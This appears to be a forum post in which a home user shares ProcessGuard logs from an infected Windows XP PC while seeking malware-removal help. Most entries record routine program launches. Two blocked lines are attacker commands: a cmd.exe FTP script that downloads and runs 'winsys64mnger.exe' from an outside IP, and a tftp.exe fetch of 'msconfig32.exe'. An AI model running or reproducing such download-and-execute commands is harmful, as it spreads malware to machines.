Tue 23 - 17:20:06 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Tue 23 - 17:20:06 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Tue 23 - 17:20:06 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Tue 23 - 17:20:07 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Tue 23 - 17:20:08 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Tue 23 - 17:20:09 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Tue 23 - 17:20:09 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Tue 23 - 17:20:09 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [796]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Tue 23 - 17:20:10 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]

---Process Guard Log Started---
Tue 23 - 17:25:09 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [524]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Tue 23 - 17:25:09 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [524]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Tue 23 - 17:25:11 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1516]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Tue 23 - 17:25:12 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Tue 23 - 17:25:13 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1312]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" /sched=5 ]
Tue 23 - 17:25:13 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Tue 23 - 17:25:14 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Tue 23 - 17:25:15 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Tue 23 - 17:25:15 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Tue 23 - 17:25:15 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1800]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Tue 23 - 17:25:15 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Tue 23 - 17:25:16 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Tue 23 - 17:25:16 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Tue 23 - 17:25:17 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Tue 23 - 17:25:18 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Tue 23 - 17:25:18 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Tue 23 - 17:25:18 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Tue 23 - 17:25:19 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Tue 23 - 17:25:19 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1980]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Tue 23 - 17:25:20 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Tue 23 - 17:25:25 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [524]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Tue 23 - 17:26:04 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds67de67af0af153498cbfa8878d933ccb ]
Tue 23 - 17:26:04 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susdsf8fdb505fc8ffc4fa2b7653042a2d7ea ]
Tue 23 - 17:26:04 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds9921a64800048f438f53a81d56c50b65 ]
Tue 23 - 17:26:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds340e649a472bf34085615643689fe648 ]
Tue 23 - 17:49:28 [EXECUTION] "c:\windows\system32\defrag.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\defrag.exe" -p 2d8 -s 00000ba0 -b c: ]
Tue 23 - 17:56:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susdsa5ec33f6f710224286ee82e58414c816 ]
Tue 23 - 17:56:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds9d6a113e49b2ad429e7eac9e044b278f ]
Tue 23 - 18:26:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susdsaceb3788c087c84e8608c792cd56c8c3 ]
Tue 23 - 18:26:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susdse277995ddafabb4d8b3908225c51a0d1 ]
Tue 23 - 18:56:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susdsbd60c8d698766248b250f27e66a9f34d ]
Tue 23 - 18:56:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds6e534f6ad4eb934db9d1f9316bac69a2 ]
Tue 23 - 19:01:47 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Tue 23 - 19:02:42 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [536]
[EXECUTION] Commandline - [ cmd /k echo open 202.124.159.120 24056 >> ii&echo user 1 1 >> ii &echo get winsys64mnger.exe >> ii &echo quit >> ii &ftp -n -s:ii &winsys64mnger.exe
]
Tue 23 - 19:05:20 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\windows\system32\notepad.exe" ]
Tue 23 - 19:06:20 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Tue 23 - 19:06:29 [EXECUTION] "c:\windows\regedit.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ regedit.exe "c:\scvhost.reg" ]
Tue 23 - 19:26:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susdsd0e0d0464a658f419422c1686ba26bbe ]
Tue 23 - 19:26:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds7cd5f2a80590da4d8e29fe3a9b5a5e04 ]
Tue 23 - 19:56:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susdse4922583f20e53408369281a674ae6e6 ]
Tue 23 - 19:56:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susdsa274d2b92dd70a41aebdac5d34553de5 ]
Tue 23 - 20:26:06 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds603623d200ea574b8ea700676237e6df ]
Tue 23 - 20:26:06 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds32300baa1d157c4c8ed4c2591dace104 ]
Tue 23 - 20:56:06 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susdsa5ffffd4e1d54644b78a13a31470bfd0 ]
Tue 23 - 20:56:06 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds6b761e99f7f3014a80260e22480a36fd ]
Tue 23 - 21:26:06 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds30c6d9aecd71004f98ee17beef017b67 ]
Tue 23 - 21:26:06 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds647a4cf281853344ac67ac2d8b203fe2 ]
Tue 23 - 21:33:43 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [476]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
Tue 23 - 21:33:54 [TERMINATE] c:\windows\system32\services.exe [524] was blocked from terminating c:\windows\system32\spoolsv.exe [972]

---Process Guard Log Started---
Wed 24 - 19:10:32 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1492]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Wed 24 - 19:10:32 [EXECUTION] "c:\program files\grisoft\avg free\avgw.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1272]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgw.exe" /test=2 ]
Wed 24 - 19:10:32 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Wed 24 - 19:10:33 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1272]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" /sched=5 ]
Wed 24 - 19:10:34 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Wed 24 - 19:10:34 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Wed 24 - 19:10:35 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Wed 24 - 19:10:35 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Wed 24 - 19:10:36 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Wed 24 - 19:10:37 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Wed 24 - 19:10:37 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Wed 24 - 19:10:38 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Wed 24 - 19:10:39 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Wed 24 - 19:10:39 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Wed 24 - 19:10:40 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Wed 24 - 19:10:40 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Wed 24 - 19:10:41 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2028]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Wed 24 - 19:10:41 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Wed 24 - 19:10:42 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1840]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Wed 24 - 19:10:49 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [568]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Wed 24 - 19:11:18 [EXECUTION] "c:\documents and settings\dug and tania\my documents\hijack\hijackthis.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\hijack\hijackthis.exe" ]
Wed 24 - 19:11:28 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [788]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[314]susdsf297694e0c0570459059c0c9f5c8789b ]
Wed 24 - 19:11:28 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [788]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[314]susds09e945bdfa395b4cb0645046af2bcfa5 ]
Wed 24 - 19:11:29 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [788]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[314]susds03304e4aa107c448b60c86b73ecab611 ]
Wed 24 - 19:11:29 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [788]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[314]susds9c0e97e59fbc2f42bf2a1583e5040c56 ]
Wed 24 - 19:11:32 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\documents and settings\dug and tania\my documents\hijack\hijackthis.exe" [908]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\documents and settings\dug and tania\my documents\hijack\hijackthis.log ]
Wed 24 - 19:12:15 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Wed 24 - 19:13:34 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\pglog_08_2005.txt ]
thanks for your help
  • 0

#149
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
this log may interest you as well tftp.exe is back

---Process Guard Log Started---
Wed 24 - 19:23:25 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Wed 24 - 19:23:26 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Wed 24 - 19:23:26 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1320]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Wed 24 - 19:23:27 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Wed 24 - 19:23:28 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Wed 24 - 19:23:28 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Wed 24 - 19:23:28 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Wed 24 - 19:23:28 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Wed 24 - 19:23:29 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Wed 24 - 19:23:29 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1844]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Wed 24 - 19:23:30 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Wed 24 - 19:23:31 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Wed 24 - 19:23:31 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Wed 24 - 19:23:31 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Wed 24 - 19:23:31 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Wed 24 - 19:23:32 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Wed 24 - 19:23:32 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Wed 24 - 19:23:32 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Wed 24 - 19:23:32 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [396]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Wed 24 - 19:23:33 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Wed 24 - 19:24:12 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsc339fcd23292f24dbf7535b49f0ce283 ]
Wed 24 - 19:24:12 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsc43579fa1323614bb48e90dacb7a785f ]
Wed 24 - 19:24:12 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf8b92ef092572b4780c239a26cf94acc ]
Wed 24 - 19:24:12 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds3a10222c43348147a5a866c21bb684a5 ]
Wed 24 - 19:24:16 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Wed 24 - 19:27:14 [EXECUTION] "c:\windows\system32\tftp.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ tftp.exe -i 202.124.162.214 get msconfig32.exe ]
Wed 24 - 19:37:00 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
